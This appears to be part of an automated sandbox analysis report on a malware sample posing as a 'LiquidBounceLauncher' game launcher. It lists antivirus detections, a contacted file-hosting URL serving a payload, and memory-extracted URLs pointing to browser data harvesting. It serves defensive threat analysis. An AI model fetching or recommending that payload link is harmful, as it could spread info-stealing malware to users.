                      SourceDetectionScannerLabelLinkDownload
                      4.2.AppLaunch.exe.400000.0.unpack100%AviraHEUR/AGEN.1247441Download File
                      17.3.Tempsvchost.exe.2260000.0.unpack100%AviraTR/ATRAPS.Gen4Download File
                      0.3.LiquidBounceLauncher.exe.7b0000.0.unpack100%AviraHEUR/AGEN.1247441Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      dl.uploadgram.me4%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://service.r0%URL Reputationsafe
                      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id90%URL Reputationsafe
                      http://tempuri.org/Entity/Id80%URL Reputationsafe
                      http://tempuri.org/Entity/Id50%URL Reputationsafe
                      http://tempuri.org/Entity/Id40%URL Reputationsafe
                      http://tempuri.org/Entity/Id70%URL Reputationsafe
                      http://tempuri.org/Entity/Id60%URL Reputationsafe
                      http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                      http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                      http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                      http://support.a0%URL Reputationsafe
                      http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id200%URL Reputationsafe
                      http://tempuri.org/Entity/Id210%URL Reputationsafe
                      http://tempuri.org/Entity/Id220%URL Reputationsafe
                      http://tempuri.org/Entity/Id230%URL Reputationsafe
                      http://tempuri.org/Entity/Id240%URL Reputationsafe
                      http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                      http://forms.rea0%URL Reputationsafe
                      http://tempuri.org/Entity/Id100%URL Reputationsafe
                      http://tempuri.org/Entity/Id110%URL Reputationsafe
                      http://tempuri.org/Entity/Id120%URL Reputationsafe
                      http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id130%URL Reputationsafe
                      http://tempuri.org/Entity/Id140%URL Reputationsafe
                      http://tempuri.org/Entity/Id150%URL Reputationsafe
                      http://tempuri.org/Entity/Id160%URL Reputationsafe
                      http://tempuri.org/Entity/Id170%URL Reputationsafe
                      http://tempuri.org/Entity/Id180%URL Reputationsafe
                      http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id190%URL Reputationsafe
                      http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                      https://dl.uploadgram.me/628a4c7f14fb9g?raw0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      dl.uploadgram.me
                      		176.9.247.226
                      		truefalseunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://dl.uploadgram.me/628a4c7f14fb9g?rawfalse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/02/sc/sctAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/chrome_newtabAppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355525800.000000000731F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358181456.00000000084D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355371895.0000000007281000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356235277.0000000007600000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358403236.0000000008541000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.357633859.0000000008257000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355979406.000000000753F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356471909.00000000076C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://service.rAppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355525800.000000000731F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358181456.00000000084D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355371895.0000000007281000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356235277.0000000007600000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358403236.0000000008541000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.357633859.0000000008257000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355979406.000000000753F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356471909.00000000076C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultLAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id12ResponseAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/Entity/Id2ResponseAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id21ResponseAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id9AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id8AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Entity/Id5AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id4AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id7AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id6AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://support.google.com/chrome/?p=plugin_realAppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id19ResponseAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.interoperabilitybridges.com/wmp-extension-for-chromeAppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.google.com/chrome/?p=plugin_pdfAppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/Entity/Id15ResponseAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://forms.real.com/real/realone/download.html?type=rpsp_usAppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://support.aAppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://tempuri.org/Entity/Id6ResponseAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://api.ip.sb/ipLiquidBounceLauncher.exe, LiquidBounceLauncher.exe, 00000000.00000000.263929326.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, LiquidBounceLauncher.exe, 00000000.00000003.261371642.00000000007B2000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.353313209.0000000000402000.00000020.00000400.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeAppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://support.google.com/chrome/?p=plugin_quicktimeAppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/scAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://tempuri.org/Entity/Id9ResponseAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355525800.000000000731F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358181456.00000000084D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355371895.0000000007281000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356235277.0000000007600000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358403236.0000000008541000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.357633859.0000000008257000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355979406.000000000753F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356471909.00000000076C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id20AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://tempuri.org/Entity/Id21AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://tempuri.org/Entity/Id22AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id23AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://tempuri.org/Entity/Id24AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://tempuri.org/Entity/Id24ResponseAppLaunch.exe, 00000004.00000002.356938745.0000000007799000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://tempuri.org/Entity/Id1ResponseAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.google.com/chrome/?p=plugin_shockwaveAppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://search.yahoo.com/searchAppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://forms.reaAppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trustAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://tempuri.org/Entity/Id10AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://tempuri.org/Entity/Id11AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://tempuri.org/Entity/Id12AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://tempuri.org/Entity/Id16ResponseAppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelAppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://tempuri.org/Entity/Id13AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://tempuri.org/Entity/Id14AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://tempuri.org/Entity/Id15AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
